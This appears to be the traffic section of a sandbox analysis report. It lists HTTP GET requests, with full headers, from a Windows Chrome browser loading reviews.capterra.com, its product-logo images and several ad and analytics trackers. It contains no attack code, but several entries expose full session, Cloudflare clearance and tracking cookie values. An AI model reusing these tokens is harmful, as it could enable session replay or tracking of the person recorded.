Source: global traffic HTTP traffic detected: GET /td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /fsrelay/s/settings/18VAT4/v1/web HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"traceparent: 00-000000000000000004d44f21d9817fc6-20ded07572ba4bf6-01sec-ch-ua-mobile: ?0x-datadog-origin: rumUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36x-datadog-sampling-priority: 1x-datadog-trace-id: 347990078016028614x-datadog-parent-id: 2368559656898022390sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e60c0fa1-f0d4-40ac-a412-0b2261b1f9a0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/44e20468-ea22-4d70-9132-b88c151348b5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/82a342f4-1d08-4265-877a-83f0d7b3858f.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/3f97e69e-54a0-4b38-95b7-c226481cff4c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /activityi;dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: 8036043.fls.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034620739&cv=11&fst=1725034620739&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /static/logos/capterra-logo.svg HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=88145&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
Source: global traffic HTTP traffic detected: GET /messenger/web/metrics HTTP/1.1Host: api-iam.intercom.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e1b492c5-8a97-4b86-a422-d317b2480afa.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/5179d6b3-aa3f-403b-8cb4-718850815472.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/b0bf7e60-e572-4090-8dd8-0e950b0ad16d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fsrelay/s/fs.js HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /fsrelay/s/settings/18VAT4/v1/web HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/db285424-c32d-461f-9382-c24a52b4c2ef.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a5d35bcd-e674-49ae-b851-7c2579a7969f.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/bcf1f306-bfbc-4489-9efe-4cea2b273e4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/e60c0fa1-f0d4-40ac-a412-0b2261b1f9a0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
